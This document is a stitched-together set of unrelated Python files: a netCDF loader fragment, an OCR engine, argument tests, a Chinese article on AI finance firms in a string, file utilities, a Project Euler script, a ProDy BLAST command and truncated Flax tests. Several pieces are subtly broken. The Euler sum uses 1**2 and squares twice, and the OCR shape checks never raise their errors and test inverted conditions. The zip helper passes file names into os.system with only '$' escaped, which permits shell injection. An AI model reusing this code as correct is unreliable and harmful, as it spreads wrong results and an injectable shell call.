# data storage, whole shebang
loop_dict = {}
# list holds a series of slices, parsed from dict above
loop_list = []
for key, clean_key in zip(obj_var_keys, clean_var_keys):
# data
loop_dict[clean_key] = \
data.variables[key][:, :].flatten(order='C')
# number of values in time
loop_lim = data.variables[obj_var_keys[0]].shape[0]
# number of values per time
step_size = len(data.variables[obj_var_keys[0]][0, :])
# check if there is an index we should use
if not (index_key_name is None):
# an index was found
time_var = loop_dict.pop(index_key_name)
if time_index_flag:
# create datetime index from data
time_var = pds.to_datetime(1E6 * time_var)
new_index = time_var
new_index_name = index_name
else:
# using integer indexing
new_index = np.arange(loop_lim*step_size,
dtype=int) % step_size
new_index_name = 'index'
# load all data into frame
if len(loop_dict.keys()) > 1:
loop_frame = pds.DataFrame(loop_dict,
columns=clean_var_keys)
if obj_key_name in loop_frame:
del loop_frame[obj_key_name]
# break massive frame into bunch of smaller frames
for i in np.arange(loop_lim, dtype=int):
loop_list.append(loop_frame.iloc[step_size*i:step_size*(i+1), :])
loop_list[-1].index = new_index[step_size*i:step_size*(i+1)]
loop_list[-1].index.name = new_index_name
else:
loop_frame = pds.Series(loop_dict[clean_var_keys[0]],
name=obj_var_keys[0])
# break massive series into bunch of smaller series
for i in np.arange(loop_lim, dtype=int):
loop_list.append(loop_frame.iloc[step_size*i:step_size*(i+1)])
loop_list[-1].index = new_index[step_size*i:step_size*(i+1)]
loop_list[-1].index.name = new_index_name
# add 2D object data, all based on a unique dimension within
# netCDF, to loaded data dictionary
loadedVars[obj_key_name] = loop_list
del loop_list
# we now have a list of keys that need to go into a dataframe,
# could be more than one, collect unique dimensions for 2D keys
for dim in set(three_d_dims):
# collect variable names associated with dimension
idx_bool = [dim == i for i in three_d_dims]
idx, = np.where(np.array(idx_bool))
obj_var_keys = []
for i in idx:
obj_var_keys.append(three_d_keys[i])
for obj_key_name in obj_var_keys:
# store attributes in metadata
meta_dict = {}
for nc_key in data.variables[obj_key_name].ncattrs():
meta_dict[nc_key] = \
data.variables[obj_key_name].getncattr(nc_key)
mdata[obj_key_name] = meta_dict
# iterate over all variables with this dimension and store
# data
loop_dict = {}
# list holds a series of slices, parsed from dict above
loop_list = []
loop_dict[obj_key_name] = \
data.variables[obj_key_name][:, :, :]
# number of values in time
loop_lim = data.variables[obj_key_name].shape[0]
# number of values per time
step_size_x = len(data.variables[obj_key_name][0, :, 0])
step_size_y = len(data.variables[obj_key_name][0, 0, :])
step_size = step_size_x
loop_dict[obj_key_name] = \
loop_dict[obj_key_name].reshape((loop_lim*step_size_x,
step_size_y))
# check if there is an index we should use
if not (index_key_name is None):
# an index was found
time_var = loop_dict.pop(index_key_name)
if time_index_flag:
# create datetime index from data
time_var = pds.to_datetime(1E6 * time_var)
new_index = time_var
new_index_name = index_name
else:
# using integer indexing
new_index = np.arange(loop_lim*step_size,
dtype=int) % step_size
new_index_name = 'index'
# load all data into frame
loop_frame = pds.DataFrame(loop_dict[obj_key_name])
# del loop_frame['dimension_1']
# break massive frame into bunch of smaller frames
for i in np.arange(loop_lim, dtype=int):
loop_list.append(loop_frame.iloc[step_size*i:step_size*(i+1), :])
loop_list[-1].index = new_index[step_size*i:step_size*(i+1)]
loop_list[-1].index.name = new_index_name
# add 2D object data, all based on a unique dimension
# within netCDF, to loaded data dictionary
loadedVars[obj_key_name] = loop_list
del loop_list
# prepare dataframe index for this netcdf file
time_var = loadedVars.pop(epoch_name)
# convert from GPS seconds to seconds used in pandas (unix time,
# no leap)
# time_var = convert_gps_to_unix_seconds(time_var)
loadedVars[epoch_name] = \
pds.to_datetime((1E6 * time_var).astype(int))
running_store.append(loadedVars)
running_idx += len(loadedVars[epoch_name])
if strict_meta:
if saved_mdata is None:
saved_mdata = copy.deepcopy(mdata)
elif (mdata != saved_mdata):
raise ValueError(' '.join(('Metadata across filenames',
'is not the same.')))
# combine all of the data loaded across files together
out = []
for item in running_store:
out.append(pds.DataFrame.from_records(item, index=epoch_name))
out = pds.concat(out, axis=0)
else:
if len(fnames) == 1:
out = xr.open_dataset(fnames[0])
else:
out = xr.open_mfdataset(fnames, combine='by_coords')
for key in out.variables.keys():
# Copy the variable attributes from the data object to the metadata
meta_dict = {}
for nc_key in out.variables[key].attrs.keys():
meta_dict[nc_key] = out.variables[key].attrs[nc_key]
mdata[key] = meta_dict
# Remove variable attributes from the data object
out.variables[key].attrs = {}
# Copy the file attributes from the data object to the metadata
for d in out.attrs.keys():
if hasattr(mdata, d):
mdata.__setattr__(d+'_', out.attrs[d])
else:
mdata.__setattr__(d, out.attrs[d])
# Remove attributes from the data object
out.attrs = {}
return out, mdata
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import json
import cv2
import numpy as np
from os.path import isabs, realpath, join, dirname
from scipy import sparse
from .softmax import softmax
class BaseEngineLineOCR(object):
def __init__(self, json_def, gpu_id=0, batch_size=8):
with open(json_def, 'r', encoding='utf8') as f:
self.config = json.load(f)
self.line_px_height = self.config['line_px_height']
self.line_vertical_scale = self.config['line_vertical_scale']
if isabs(self.config['checkpoint']):
self.checkpoint = self.config['checkpoint']
else:
self.checkpoint = realpath(join(dirname(json_def), self.config['checkpoint']))
self.characters = tuple(self.config['characters'])
self.net_name = self.config['net_name']
if "embed_num" in self.config:
self.embed_num = int(self.config["embed_num"])
else:
self.embed_num = None
if "embed_id" in self.config:
if self.config["embed_id"] != "mean":
self.embed_id = int(self.config["embed_id"])
else:
self.embed_id = "mean"
else:
self.embed_id = None
self.gpu_id = gpu_id
self.batch_size = batch_size
self.line_padding_px = 32
self.max_input_horizontal_pixels = 480 * batch_size
def process_lines(self, lines, sparse_logits=True, tight_crop_logits=False):
"""Runs ocr network on multiple lines.
Args:
lines (iterable): contains cropped lines as numpy arrays.
Returns:
transcripts (list of strings): contains UTF-8 line transcripts
logits (list of sparse matrices): character logits for lines
"""
# check line crops for correct shape
for line in lines:
if line.shape[0] == self.line_px_height:
ValueError("Line height needs to be {} for this ocr network and is {} instead.".format(self.line_px_height, line.shape[0]))
if line.shape[2] == 3:
ValueError("Line crops need three color channes, but this one has {}.".format(line.shape[2]))
all_transcriptions = [None]*len(lines)
all_logits = [None]*len(lines)
all_logit_coords = [None]*len(lines)
# process all lines ordered by their length
line_ids = [x for x, y in sorted(enumerate(lines), key=lambda x: -x[1].shape[1])]
while line_ids:
max_width = lines[line_ids[0]].shape[1]
max_width = int(np.ceil(max_width / 32.0) * 32)
batch_size = max(1, self.max_input_horizontal_pixels // max_width)
batch_line_ids = line_ids[:batch_size]
line_ids = line_ids[batch_size:]
batch_data = np.zeros(
[len(batch_line_ids), self.line_px_height, max_width + 2*self.line_padding_px, 3], dtype=np.uint8)
for data, ids in zip(batch_data, batch_line_ids):
data[:, self.line_padding_px:self.line_padding_px+lines[ids].shape[1], :] = lines[ids]
if batch_data.shape[2] > self.max_input_horizontal_pixels:
print(f'WARNING: Line too long for OCR engine. Cropping from {batch_data.shape[2]} px down to {self.max_input_horizontal_pixels}.')
batch_data = batch_data[:, :, :self.max_input_horizontal_pixels]
out_transcriptions, out_logits = self.run_ocr(batch_data)
for ids, transcription, line_logits in zip(batch_line_ids, out_transcriptions, out_logits):
all_transcriptions[ids] = transcription
if tight_crop_logits:
line_logits = line_logits[
int(self.line_padding_px // self.net_subsampling):int(
(self.line_padding_px + lines[ids].shape[1]) // self.net_subsampling)]
all_logit_coords[ids] = [None, None]
#else:
# line_logits = line_logits[
# int(self.line_padding_px // self.net_subsampling - 2):int(
# lines[ids].shape[1] // self.net_subsampling + 8)]
else:
all_logit_coords[ids] = [
int(self.line_padding_px // self.net_subsampling),
int((self.line_padding_px + lines[ids].shape[1]) // self.net_subsampling)]
if sparse_logits:
line_probs = softmax(line_logits, axis=1)
line_logits[line_probs < 0.0001] = 0
line_logits = sparse.csc_matrix(line_logits)
all_logits[ids] = line_logits
return all_transcriptions, all_logits, all_logit_coords
class EngineLineOCR(BaseEngineLineOCR):
def __init__(self, json_def, gpu_id=0, batch_size=8):
super(EngineLineOCR, self).__init__(json_def, gpu_id=0, batch_size=8)
import tensorflow as tf
from .CTC_nets import build_eval_net, line_nets
self.net_graph = tf.Graph()
tf.reset_default_graph()
with self.net_graph.as_default():
net = line_nets[self.net_name]
(saver, input_data, _, seq_len, logits, logits_t, decoded, _) = build_eval_net(
[self.batch_size, self.line_px_height, None, 3], len(self.characters), net)
self.net_subsampling = 1
self.out_decoded = decoded
self.out_logits = logits
self.in_seq_len = seq_len
self.saver = saver
self.input_data = input_data
if gpu_id is None:
config = tf.ConfigProto(device_count={'GPU': 0})
else:
config = tf.ConfigProto(device_count={'GPU': 1})
config.gpu_options.allow_growth = True
self.session = tf.Session(graph=self.net_graph, config=config)
self.saver.restore(self.session, self.checkpoint)
self.data_shape = [self.batch_size, self.line_px_height, None, 3]
self.data_shape[2] = 128
out_logits, = self.session.run(
[self.out_logits],
feed_dict={self.input_data: np.zeros(self.data_shape, dtype=np.uint8)}
)
self.net_subsampling = self.data_shape[2] / out_logits.shape[1]
self.data_shape[2] = None
def run_ocr(self, batch_data):
seq_lengths = np.ones([self.batch_size], dtype=np.int32) * batch_data.shape[2] / self.net_subsampling
out_decoded, out_logits = self.session.run(
[self.out_decoded, self.out_logits],
feed_dict={self.input_data: batch_data, self.in_seq_len: seq_lengths})
out_decoded = out_decoded[0]
transcriptions = [None] * batch_data.shape[0]
for i in range(batch_data.shape[0]):
pos, = np.nonzero(out_decoded.indices[:, 0] == i)
tmp_string = ''
if pos.size:
for val in out_decoded.values[pos]:
tmp_string += self.characters[val]
transcriptions[i] = tmp_string
return transcriptions, out_logits
def test_line_ocr(line_list, ocr_engine_json):
ocr_engine = EngineLineOCR(ocr_engine_json, gpu_id=1)
lines = []
for line in line_list:
line_img = cv2.imread(line, 1)
if line_img is None:
raise ValueError('Error: Could not read image "{}"'.format(line))
lines.append(line_img)
transcriptions, logits, _ = ocr_engine.process_lines(lines)
for transcription, line in zip(transcriptions, lines):
print(transcription)
cv2.imshow('out', line)
if cv2.waitKey() == 27:
return
def parseargs():
parser = argparse.ArgumentParser()
parser.add_argument('--ocr-engine', required=True, help='JSON file with line ocr engine definition.')
parser.add_argument('--line-list', required=True, help='File containing list of line images.')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parseargs()
with open(args.line_list, 'r') as f:
lines = [l.strip() for l in f.readlines()]
test_line_ocr(lines, args.ocr_engine)
|
from testutils import assert_raises
def no_args():
pass
no_args()
assert_raises(TypeError, no_args, 'one_arg', _msg='1 arg to no_args')
assert_raises(TypeError, no_args, kw='should fail', _msg='kwarg to no_args')
def one_arg(arg):
return arg
one_arg('one_arg')
assert "arg" == one_arg(arg="arg")
assert_raises(TypeError, one_arg, _msg='no args to one_arg')
assert_raises(TypeError,
lambda: one_arg(wrong_arg='wont work'),
'incorrect kwarg to one_arg')
assert_raises(TypeError,
lambda: one_arg('one_arg', 'two_arg'),
'two args to one_arg')
assert_raises(TypeError,
lambda: one_arg('one_arg', extra_arg='wont work'),
'no TypeError raised: extra kwarg to one_arg')
assert_raises(TypeError,
lambda: one_arg('one_arg', arg='duplicate'),
'same pos and kwarg to one_arg')
def one_default_arg(arg="default"):
return arg
assert 'default' == one_default_arg()
assert 'arg' == one_default_arg('arg')
assert 'kwarg' == one_default_arg(arg='kwarg')
assert_raises(TypeError,
lambda: one_default_arg('one_arg', 'two_arg'),
'two args to one_default_arg')
def one_normal_one_default_arg(pos, arg="default"):
return pos, arg
assert ('arg', 'default') == one_normal_one_default_arg('arg')
assert ('arg', 'arg2') == one_normal_one_default_arg('arg', 'arg2')
assert_raises(TypeError,
lambda: one_normal_one_default_arg(),
'no args to one_normal_one_default_arg')
assert_raises(TypeError,
lambda: one_normal_one_default_arg('one', 'two', 'three'),
'three args to one_normal_one_default_arg')
def two_pos(a, b):
return (a, b)
assert ('a', 'b') == two_pos('a', 'b')
assert ('a', 'b') == two_pos(b='b', a='a')
def kwargs_are_variable(x=[]):
x.append(1)
return x
assert [1] == kwargs_are_variable()
assert [1, 1] == kwargs_are_variable()
|
#!/usr/bin/python
# encoding: utf-8
"""
@author: Ian
@contact:yongguiluo@hotmail.com
@file: text.py.py
@time: 2019/3/20 14:02
"""
title = '智能金融起锚:文因、数库、通联瞄准的kensho革命'
text = '''2015年9月13日,39岁的鲍捷乘上从硅谷至北京的飞机,开启了他心中的金融梦想。
鲍捷,人工智能博士后,如今他是文因互联公司创始人兼CEO。和鲍捷一样,越来越多的硅谷以及华尔街的金融和科技人才已经踏上了归国创业征程。
在硅谷和华尔街,已涌现出Alphasense、Kensho等智能金融公司。
如今,这些公司已经成长为独角兽。
大数据、算法驱动的人工智能已经进入到金融领域。人工智能有望在金融领域最新爆发。
前段时间,笔者写完了《激荡二十五年:Wind、同花顺、东方财富、大智慧等金融服务商争霸史》、《边缘崛起:雪球、老虎、富途、牛股王等互联网券商的新玩法》,探讨了互联网时代、移动互联网时代创业者们的创想。
人工智能与金融正在融合,这里我们聚焦一下投研领域,后续会向交易、投顾等领域延展。这篇文章将描绘一下Kensho、文因互联、数库科技、通联数据在这个领域的探索和尝试,看看新时代正在掀起的巨浪。
1、Kensho的颠覆式革命
华尔街的Kensho是金融数据分析领域里谁也绕不过的一个独角兽。这家公司获得由高盛领投的6280万美元投资,总融资高达7280万美元。
33岁的Kensho创始人Daniel Nadler预言:在未来十年内,由于Kensho和其他自动化软件,金融行业有三分之一到二分之一的雇员将失业。
2014年,Nadler在哈佛大学学习数学和古希腊文化。大学期间,他在美联储担任访问学者时惊奇地发现,这家全球最具权势的金融监管机构仍然依靠Excel来对经济进行分析。
当时,希腊选举以及整个欧洲的不稳定局面正强烈冲击金融市场。访问期间,Nadler意识到无论是监管者还是银行家,除了翻过去的新闻消息以外,并不能给出什么好的方案。
于是,他和麻省理工学院的好友一起想办法,并借鉴Google的信息处理方法,来分析资本市场,设计出了Kensho软件。
一个典型的工作场景是:早上八点,华尔街的金融分析师冲进办公室,等待即将在8点半公布的劳工统计局月度就业报告。他打开电脑,用Kensho软件搜集劳工部数据。
两分钟之内,一份Kensho自动分析报告便出现在他的电脑屏幕上:一份简明的概览,随后是13份基于以往类似就业报告对投资情况的预测。
金融分析师们再无需检查,因为Kensho提取的这些分析基于来自数十个数据库的成千上万条数据。
Kensho界面与Google相似,由一条简单的黑色搜索框构成。其搜索引擎自动将发生的事件根据抽象特征进行分类。
福布斯报道过运用Kensho的成功案例。例如,英国脱欧期间,交易员成功运用Kensho了解到退欧选举造成当地货币贬值;此外,Kensho还分析了美国总统任期的前100天内股票涨跌情况(见下图):
(图片来源:福布斯)
Kensho在构建金融与万物的关联,并用结构化、数据化的方式去呈现。公司还专门雇佣了一位机器学习专家,而这位专家此前为谷歌研究世界图书馆的大型分类方法。
处理复杂的事件与投资关联,Kensho只需要几分钟。但是在华尔街一个普通的分析师需要几天时间去测算对各类资产的影响。而这些分析师普遍拿着30—40万美元的年薪。
此外,硅谷的创业公司AlphaSense公司已经悄然建成了一个解决专业信息获取和解决信息碎片问题的金融搜索引擎。
AlphaSense的首席执行官Jack Kukko曾是摩根士丹利分析师,这赋予了其强大的金融基因。
AlphaSense可以搜索“研究文献,包括公司提交的文件证明、演示、实时新闻、新闻报道、华尔街的投资研究、以及客户的内部内容。”
AlphaSense几秒钟内即可搜索数百万个不同的财务文档, 公司内部纰漏内容和卖方研究等,使用户可以快速发现关键数据点,并通过智能提醒、跟踪重要信息点、防止数据遗漏,做出关键的决策。
AlphaSense目前已经向包括摩根大通等投资和咨询公司、全球银行、律师事务所和公司(如甲骨文)等500余位客户提供服务。
2、海归博士的智能金融实验
2017年6月,在北京朝阳区的一个居民楼的办公室内,鲍捷和他的20名创业伙伴正在摸索打造一款智能金融分析工具,而他的目标正是华尔街的AlphaSense和Kensho。
41岁的鲍捷很享受创业,他说在中国这是最好的创业时代。在此之前,他有一段漫长的求学历程。
鲍捷是一个信息整理控,他从小学开始整理所有的历史人物、水文地理、卡通人物的关系等。合肥工业大学研究生阶段,他师从德国斯图加特大学归来的博士高隽,学习人工智能,深度研究神经网络。
2001年,他离开中国进入美国,先后为Lowa State Univ博士、RPI博士后、MIT访问研究员、BBN访问研究员,在美国完成了11年人工智能的学习和研究。他先后师从语义网创始人Jim Hendler和万维网发明人、图灵奖得主Tim Berners-Lee,参与了语义网学科形成期间的一些关键研究项目,并是知识图谱国际标准OWL的作者之一。
2013年,在三星研究院工作不到两年后,他开始了在硅谷的创业,研发了一款名为“好东西传送门”的产品。
该产品主要利用机器人程序在网站抓取人工智能、机器学习、大数据的最新技术资讯,利用专业领域知识过滤后,自动生产内容,传送至需要的人。
好东西传送门获取了数万铁粉,但无法盈利。2015年9月,他离开硅谷飞往北京,归国的第一天,便获得了无量资本100万美元的天使轮融资。他在中国创立了“文因互联”。
其实鲍捷很早就看到了人工智能和金融结合的前景。在2010年,他就提出了金融报表语言XBRL的语义模型。2015年底,他看到了Kensho在金融领域带来的革命,结合国内的投资需求,他选择了在新三板领域开始切入,当时只有7名员工,经过半年研发,文因在2016年5月推出了“快报”和“搜索”。
“快报”能够自动抓取每日公告、财报、新闻资讯等;而“搜索”能够自动提取产业链上下游公司、结构化财报等各类数据。
“这两款产品为我们获取了1万铁粉,虽然产品有很多缺陷,但是依旧很多人喜欢这个工具,因为以前没有能够满足这种需求的服务。”鲍捷向华尔街见闻表示。
但是他们发现做搜索需要庞大的知识架构,需要去集成各种金融相关数据,开发公司标签、产业标签、产业链等复杂的知识图谱,而做这个体系,再烧几亿,可能也无法完成。
更为恐怖的是,做完产品还要和金融信息服务商竞争。Wind、同花顺、东方财富,挡在了文因互联面前。
“我放弃了从头到尾设计一个大系统的想法,而是从具体场景出发解决单点问题。从年底开始我分了一部分人去做项目,但每一个项目都是我们大系统里面的一个组件,这个项目根据金融客户的真实需求去打磨,然后将这些组件整合为一个系统的产品。”鲍捷反思道,创业需要寻找用户最痛的点,然后扎下去解决问题。
经过一年的创业,鲍捷变得更接地气。去年下半年以来,他密集地拜访各大银行、基金、保险、券商,根据金融机构的需求,在标准化产品之上定制化,从具体业务的自动化出发走向智能化。
目前恒丰银行、南京银行、中债资信等均已成为文因互联的合作客户。
文因互联很快根据金融机构的需求开发出了公告摘要、自动化报告、财报结构化数据等多个软件产品,并开发出了投研小机器人。
2016年年底,文因互联再次获得睿鲸资本Pre-A轮融资。而这位睿鲸资本的投资人,曾经是鲍捷的网友,他们经常在一起讨论人工智能问题。
鲍捷举例说,深市、沪市、新三板加在一起每天平均大概3000-4000份公告,每天处理公告数据提取和摘要,这是一件非常繁琐的事情。很多金融机构要养20多人处理公告,而且这些人还不能快速高效准确地处理。这类事情机器做最适合。给机器程序输入金融知识,并通过模型训练,能够快速准确地提取各项公告摘要和年报摘要。
鲍捷表示,文因互联长远目标是Kensho,用人工智能提升金融投研效率和渠道效率,而这还有很长的路要走。
3、中国式创新距离Kensho有多远?
上海的另外一位海归,也选择在金融研投领域创业,他叫刘彦,已经归国创业了八年。
八年前,他创立的数库科技,如今获得了京东金融1000万美元的投资。
2003年,23岁的他从密歇根商学院毕业,进入华尔街瑞信公司,一年后他主动调到香港分公司。 5年里,他主导完成了建设银行、工商银行、太平洋保险等大公司的上市项目。
华尔街2008年的金融危机波及全球,人性的贪婪和恐惧暴露无遗。在刘彦眼里,从数据层面到决策层面,每一个环节都充斥着被加工过的信息。2009年,他选择回到上海创业。刘彦最初的野心很大,想构建中国的彭博终端,他花费两年的时间构建完成“半结构化数据”。
2011年,数库获得穆迪资本500万美元投资。很快,原公司从70人扩张到140人。但因数库的战略计划并未完成,穆迪资本放弃进一步投资,他和联合创始人沈鑫卖掉房子,继续维持运营。
刘彦破釜沉舟,公司很快攻克了信息识别系统和精度抓取,并在深度分析等方面取得突破。
数库科技试图覆盖全球上市公司:A股3218家、港股1993家美股4953家、新三板10725家、非上市金融490家、股权交易中心2467家。
目前,数库主要服务于B端金融机构。数库自称核心独家的产品有两款:其一、SAM(Segment Analytics Mapping)行业分析工具。数库是根据上市公司实际披露的产品分项推导出其行业分类,会根据上市公司的定期报告实时做出调整。数库行业分类,分为10个层级,4000个产品节点,帮助投资者快速了解产业竞争环境、系统化对比公司财务及运营数据。其二、产业链的分析工具。数库在行业分析工具SAM的基础上,衍生出的一个分析工具。从产业链条的角度,将上市公司通过产品相互关联,帮助投资人优先布局上下游的投资机会。
刘彦的终极理想是通过科技的发展,使金融从“投机”和“博弈”中逐渐走出来,走向非人为的自动化运行,把专业人士和投资弱势群体之间的距离拉近,使个人拥有机构投资者的能力。
这两年,科技金融成为创投最热的风口。中国的大集团也瞄准了这个产业变革的机会。国内民营巨头万向集团看准了智能金融这个方向。
2011年,万向集团挖来了时任博时基金总经理肖风,担任万向集团副董事长。他迅速构建起庞大的金融帝国:浙商银行、浙商基金、民生人寿、万向财务、通联数据等公司。
2013年12月,注册资本3亿元的通联数据在上海创立,肖峰为创始人兼董事长。
通联数据的野心很庞大,目前员工达到300人,正面与Wind、同花顺、东方财富竞争,并推出了PC和移动端的资产管理业务的一站式服务平台,内容涵盖大数据分析、智能投资研究、量化研究、智能投顾和资产配置管理服务等多个领域。
通联数据认为,自己的核心是有一批高素质的技术人才,同时还有顶级金融人才。
2017年6月6日,恒生电子正式面向金融机构推出最新的人工智能产品:涵盖智能投资、智能资讯、智能投顾、智能客服四大领域。其中一款产品智能小梵可通过强大人机自然交互,提供精准数据提炼及智能资讯分析。
在笔者的走访中,越来越多高科技人才、金融人才进入智能金融投研领域,这个领域已经成为红海。
谁能够乘着人工智能浪潮,成为新一代的金融信息服务终端?
敬请关注后续报道。
'''
|
__author__ = 'thorwhalen'
# utils to get from a pfile to... something else
from ut.pfile.name import replace_extension
import os
import gzip
def string(filename):
"""
returns the string contents of a pfile
"""
fid = file(filename)
s = fid.read()
fid.close()
return s
def zip_file(source_file, destination_file=None):
if destination_file is None: # if no destination file is given, add the .zip extension to create the dest file
destination_file = source_file + '.zip'
assert destination_file != source_file # to make sure source and destination are not the same
elif os.path.isdir(destination_file):
destination_file = os.path.join(destination_file, source_file + '.zip')
source_file = source_file.replace('$', '\$') # replacing the unix-escape character $ with \$
os_system_result = os.system('zip "'+ destination_file.replace('$', '\$') + '" "' + source_file + '"')
return destination_file
def gzip_file(source_file, destination_file=None):
import gzip
if destination_file is None: # if no destination file is given, add the .zip extension to create the dest file
destination_file = source_file + '.gzip'
assert destination_file != source_file # to make sure source and destination are not the same
elif os.path.isdir(destination_file):
destination_file = os.path.join(destination_file, source_file + '.gzip')
with open(source_file, 'rb') as orig_file:
with gzip.open(destination_file, 'wb') as zipped_file:
zipped_file.writelines(orig_file)
return destination_file
def ungzip(gzip_file, destination_file):
in_file = gzip.open(gzip_file, 'rb')
out_file = open(destination_file, 'wb')
out_file.write(in_file.read())
in_file.close()
out_file.close()
def tail(f, window=20):
"""
Returns the last `window` lines of file `f` as a list.
"""
if isinstance(f, str):
f = open(f, 'r')
file_should_be_closed = True
else:
file_should_be_closed = False
if window == 0:
return []
BUFSIZ = 1024
f.seek(0, 2)
bytes = f.tell()
size = window + 1
block = -1
data = []
while size > 0 and bytes > 0:
if bytes - BUFSIZ > 0:
# Seek back one whole BUFSIZ
f.seek(block * BUFSIZ, 2)
# read BUFFER
data.insert(0, f.read(BUFSIZ))
else:
# file too small, start from begining
f.seek(0,0)
# only read what was not read
data.insert(0, f.read(bytes))
linesFound = data[0].count('\n')
size -= linesFound
bytes -= BUFSIZ
block -= 1
if file_should_be_closed:
f.close()
return '\n'.join(''.join(data).splitlines()[-window:])
|
from .sed import Sed, SedException, main
|
sum_square = square_sum = 0
for i in range(1, 101):
sum_square += 1**2
square_sum += i
square_sum = square_sum ** 2
resultat = square_sum ** 2 - sum_square
print("Résultat")
print(resultat)
|
# ProDy: A Python Package for Protein Dynamics Analysis
#
# Copyright (C) 2010-2012 Ahmet Bakan
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
"""Blast Protein Data Bank for structures matching a user given sequence."""
__author__ = 'Ahmet Bakan'
__copyright__ = 'Copyright (C) 2010-2012 Ahmet Bakan'
import os.path
from actions import *
def readFirstSequenceFasta(filename):
"""Return first sequence from a file."""
fasta = open(filename)
seq = []
title = ''
first = True
for line in fasta:
if line[0] == '>':
if first:
title = line[1:].strip()
first = False
else:
break
else:
seq.append( line.strip() )
fasta.close()
return title, ''.join(seq)
def prody_blast(opt):
"""Blast search PDB based on command line arguments."""
import prody
LOGGER = prody.LOGGER
seq = opt.seq
title = None
if os.path.isfile(seq):
title, seq = readFirstSequenceFasta(seq)
LOGGER.info("First sequence ({0:s}) is parsed from {1:s}."
.format(title, repr(seq)))
if not seq.isalpha() or not seq.isupper():
opt.subparser.error("{0:s} is not a valid sequence or a file"
.format(repr(seq)))
folder, identity, coverage = opt.folder, opt.identity, opt.coverage
if not 0 < identity < 100:
opt.subparser.error('identity must be between 0 and 100')
if not 0 < coverage < 100:
opt.subparser.error('overlap must be between 0 and 100')
blast_results = prody.blastPDB(seq)
hits = blast_results.getHits(percent_identity=identity,
percent_coverage=coverage)
#sort hits by decreasing percent identity
hits2 = []
for pdb in hits:
hits2.append( (-hits[pdb]['percent_identity'], pdb) )
hits2.sort()
for identity, pdb in hits2:
chain = hits[pdb]['chain_id']
percent_identity = hits[pdb]['percent_identity']
title = hits[pdb]['title']
print(pdb + ' ' + chain + ' ' + ('%5.1f%%' % (percent_identity)) +
' ' + title)
# download hits if --folder is given
if opt.folder:
LOGGER.info('Downloading hits to ' + opt.folder)
pdblist = [ pdb for identity, pdb in hits2 ]
pdblist2 = prody.fetchPDB(pdblist, opt.folder,
compressed=opt.gzip, copy=True)
def addCommand(commands):
subparser = commands.add_parser('blast',
help='blast search Protein Data Bank')
subparser.add_argument('--quiet', help="suppress info messages to stderr",
action=Quiet, nargs=0)
subparser.add_argument('--examples', action=UsageExample, nargs=0,
help='show usage examples and exit')
subparser.set_defaults(usage_example=
"""Blast search PDB for the first sequence in a fasta file:
$ prody blast seq.fasta -i 70
Blast search PDB for the sequence argument:
$ prody blast MQIFVKTLTGKTITLEVEPSDTIENVKAKIQDKEGIPPDQQRLIFAGKQLEDGRTLSDYNIQ\
KESTLHLVLRLRGG
Blast search PDB for avidin structures, download files, and align all files \
onto the 2avi structure:
$ prody blast -d . ARKCSLTGKWTNDLGSNMTIGAVNSRGEFTGTYITAVTATSNEIKESPLHGTQNTIN\
KRTQPTFGFTVNWKFSESTTVFT
$ prody align 2avi.pdb *pdb """)
subparser.add_argument('-i', '--identity', dest='identity', type=float,
default=90.0, metavar='FLOAT',
help='percent sequence identity (default: %(default)s)')
subparser.add_argument('-o', '--overlap', dest='coverage', type=float,
default=90.0, metavar='FLOAT',
help='percent sequence overlap (default: %(default)s)')
subparser.add_argument('-d', '--dir', dest='folder', type=str,
default=None, metavar='PATH',
help=('download uncompressed PDB files to given path'))
subparser.add_argument('-z', '--gzip', dest='gzip', action='store_true',
default=False, help='write compressed PDB file')
subparser.add_argument('seq', type=str,
help=('sequence or file in fasta format'))
subparser.set_defaults(func=prody_blast)
subparser.set_defaults(subparser=subparser)
|
# Copyright 2021 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for PixelCNN Modules."""
import pixelcnn
from flax import linen as nn
from absl.testing import absltest
from absl.testing import parameterized
import numpy.testing as np_testing
from jax import random
import jax.numpy as np
from jax.config import config
class ModelTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.rng = random.PRNGKey(0)
self.x = np.arange(24).reshape(1, 4, 3, 2)
def get_weightnorm(self, params):
return [params[k] for k in ('direction', 'scale', 'bias')]
def assert_mean_and_variance(self, out):
# Weightnorm should ensure that, at initialization time, the outputs of the
# module have mean 0 and variance 1 over the non-feature dimensions.
np_testing.assert_allclose(np.mean(out, (0, 1, 2)), 0., atol=1e-5)
np_testing.assert_allclose(np.var(out, (0, 1, 2)), 1., atol=1e-5)
def test_conv(self):
model = pixelcnn.ConvWeightNorm(features=4, kernel_size=(3, 2))
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (3, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 2, 2, 4))
self.assert_mean_and_variance(out)
def test_conv_down(self):
model = pixelcnn.ConvDown(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 3, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 4, 3, 4))
self.assert_mean_and_variance(out)
def test_conv_down_right(self):
model = pixelcnn.ConvDownRight(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 2, 2, 4))
